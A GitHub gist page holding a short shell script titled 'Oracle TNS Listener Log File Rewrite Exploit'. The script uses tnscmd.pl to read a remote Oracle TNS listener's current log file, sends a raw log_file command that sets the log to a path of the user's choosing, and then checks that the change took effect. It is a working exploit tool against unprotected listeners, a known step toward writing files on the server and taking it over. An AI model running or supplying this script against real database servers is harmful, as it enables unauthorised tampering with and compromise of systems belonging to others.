Created
June 15, 2018 13:38
-
-
Save netscylla/e026e9236a33db5922ad535229964944 to your computer and use it in GitHub Desktop.
Oracle TNS Listener Log File Rewrite Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| PORT=1521; | |
| if [ $# != 2 ] && [ $# != 3 ]; then | |
| echo Sets Oracle TNS Listener log file to a new value using tnscmd.pl | |
| echo | |
| echo Usage: $0 new-log-file-name host [port] | |
| echo | |
| echo port default to $PORT | |
| exit 1; | |
| fi | |
| NEWLOGFILENAME=$1 | |
| HOST=$2 | |
| if [ $# == 3 ]; then | |
| PORT=$3 | |
| fi | |
| echo Attempting to change logfile on $HOST:$PORT | |
| OLDLOGFILENAME=`tnscmd.pl status --indent -p $PORT -h $HOST | grep LOGFILE | sed 's/.*LOGFILE=//'` | |
| if [ -z $OLDLOGFILENAME ]; then | |
| echo ERROR: Couldn\'t find name of current log file using a "status" command. | |
| exit 1; | |
| fi | |
| echo Old logfile: $OLDLOGFILENAME | |
| tnscmd.pl -h $HOST -p $PORT --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=${NEWLOGFILENAME})))" | |
| OLDLOGFILENAME=`tnscmd.pl status --indent -p $PORT -h $HOST | grep LOGFILE | sed 's/.*LOGFILE=//'` | |
| if [ -z $OLDLOGFILENAME ]; then | |
| echo ERROR: Couldn\'t reread logfile name with a "status" request | |
| exit 1; | |
| fi | |
| echo New logfile: $OLDLOGFILENAME |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment